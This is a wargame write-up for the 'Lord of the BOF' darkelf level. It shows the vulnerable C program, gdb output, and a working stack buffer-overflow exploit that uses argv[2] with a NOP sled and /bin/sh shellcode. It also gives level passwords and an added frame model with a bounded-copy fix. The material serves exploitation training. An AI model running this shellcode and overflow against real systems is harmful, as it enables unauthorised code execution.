
[LOB] wolfman → darkelf

ruming 2021. 2. 22. 02:06

Log in as wolfman / love eyuna

 

darkelf.c

/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: wipe every environment string so nothing can be staged there
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // byte 47 of argv[1] (the top byte of the return address) must be 0xbf
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument (48 bytes still exceeds buffer[40])
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter: zero the buffer so shellcode cannot live in it
        memset(buffer, 0, 40);
        return 0;
}

This time, on top of the same conditions as before, there is a limit on the length of argv[1], and the buffer is zeroed afterwards.

 

Shellcode cannot be placed after the RET area and environment variables cannot be used either, so it looks like argv[2] has to be used. I will find the address of argv[2] and place a NOP sled and the shellcode there.

[wolfman@localhost wolfman]$ gdb -q darkelf2
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %ebp,%esp
0x8048503 <main+3>:     sub    %esp,44
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804850a <main+10>:    jg     0x8048523 <main+35>
0x804850c <main+12>:    push   0x8048670
0x8048511 <main+17>:    call   0x8048410 <printf>
0x8048516 <main+22>:    add    %esp,4
0x8048519 <main+25>:    push   0
0x804851b <main+27>:    call   0x8048420 <exit>
0x8048520 <main+32>:    add    %esp,4
0x8048523 <main+35>:    nop
0x8048524 <main+36>:    mov    DWORD PTR [%ebp-44],0x0
...
0x80485e3 <main+227>:   add    %eax,4
0x80485e6 <main+230>:   mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:   push   %edx
0x80485e9 <main+233>:   lea    %eax,[%ebp-40]
0x80485ec <main+236>:   push   %eax
0x80485ed <main+237>:   call   0x8048440 <strcpy>
0x80485f2 <main+242>:   add    %esp,8
0x80485f5 <main+245>:   lea    %eax,[%ebp-40]
0x80485f8 <main+248>:   push   %eax
0x80485f9 <main+249>:   push   0x80486b0
0x80485fe <main+254>:   call   0x8048410 <printf>
0x8048603 <main+259>:   add    %esp,8
0x8048606 <main+262>:   push   40
0x8048608 <main+264>:   push   0
0x804860a <main+266>:   lea    %eax,[%ebp-40]
0x804860d <main+269>:   push   %eax
0x804860e <main+270>:   call   0x8048430 <memset>
0x8048613 <main+275>:   add    %esp,12
0x8048616 <main+278>:   leave
0x8048617 <main+279>:   ret
0x8048618 <main+280>:   nop
0x8048619 <main+281>:   nop
0x804861a <main+282>:   nop
0x804861b <main+283>:   nop
0x804861c <main+284>:   nop
0x804861d <main+285>:   nop
0x804861e <main+286>:   nop
0x804861f <main+287>:   nop
End of assembler dump.

I set a breakpoint right after the strcpy call.

 

(gdb) b *main+242
Breakpoint 1 at 0x80485f2
(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/wolfman/darkelf2 `python -c 'print "\xbf"*48'` `python -c 'print    "B"*100'`

Breakpoint 1, 0x80485f2 in main ()

argv[2] was filled with B's.

 

(gdb) x/100x $esp
...
0xbffffb94:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba4:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb4:     0x00000000      0x00000000      0x36383669      0x6f682f00
0xbffffbc4:     0x772f656d      0x6d666c6f      0x642f6e61      0x656b7261
0xbffffbd4:     0x0032666c      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbe4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbf4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc04:     0xbfbfbfbf      0x42424200      0x42424242      0x42424242
0xbffffc14:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc24:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc34:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc44:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc54:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc64:     0x42424242      0x42424242      0x00000042      0x00000000
0xbffffc74:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc84:     0x00000000      0x00000000      0x00000000      0x00000000
...

Any address inside the region filled with 0x42424242 should work. I picked 0xbffffc44.

 

dummy(44) + argv[2] address(4) + nop(1000) + shellcode(25)

./darkelf `python -c 'print "A"*44+"\x44\xfc\xff\xbf"'` `python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\x44\xfc\xff\xbf"'` `python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD??
bash$ my-pass
euid = 506
kernel crashed

The attack succeeded!

kernel crashed
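As an added example (not part of the original post or the LOB sources), the following models darkelf's main() frame as read from the disassembly (buffer at ebp-40, then the saved ebp and the return address) to show why a length check bounded at 48 instead of sizeof(buffer) still lets the 44+4 layout above reach the return address, and puts a copy bounded by the destination size next to it. It assumes a little-endian host, as the LOB VM is; the saved_ebp/ret values it starts from are constructed placeholders.

```c
/* Added example: model of darkelf's frame and its input checks, plus a
 * destination-bounded copy. Not the challenge's own code. */
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 40   /* darkelf's char buffer[40] */

/* Frame layout of darkelf's main(): buffer[40] sits directly below the saved
 * ebp and the return address, so 48 bytes written from buffer reach ret.
 * above_ret stands in for main's argc slot (ebp+8) and absorbs the NUL. */
struct frame {
    char buffer[BUF_SIZE];
    unsigned int saved_ebp;
    unsigned int ret;
    unsigned int above_ret;
};

/* darkelf's checks on argv[1]: byte 47 must be 0xbf and the length at most 48.
 * darkelf reads arg[47] before checking the length; this model only accepts
 * strings of at least 48 bytes so that read stays inside the string. */
int darkelf_accepts(const char *arg, size_t len)
{
    if (len < 48 || arg[47] != '\xbf')
        return 0;
    if (len > 48)
        return 0;
    return 1;
}

/* Effect of darkelf's strcpy(buffer, argv[1]) on the frame model: copy len+1
 * bytes (terminator included) starting at buffer. Returns the value left in
 * the return-address slot. Caller must pass an input darkelf_accepts(). */
unsigned int darkelf_copy(struct frame *f, const char *arg, size_t len)
{
    f->saved_ebp = 0xbffffc78u;   /* constructed placeholder */
    f->ret = 0x400309cbu;         /* constructed placeholder */
    memcpy(f, arg, len + 1);      /* runs past buffer[40] once len > 39 */
    return f->ret;
}

/* Corrected check: bound the copy by the destination size and count the
 * terminator. Returns 1 when copied, 0 when the input was refused. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (len >= dstsz)
        return 0;
    memcpy(dst, src, len + 1);
    return 1;
}
```

With the writeup's 48-byte argv[1] layout, darkelf_accepts() returns 1 and darkelf_copy() reports 0xbffffc44 in the return-address slot, while bounded_copy() into a 40-byte buffer refuses the same input.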

 

 
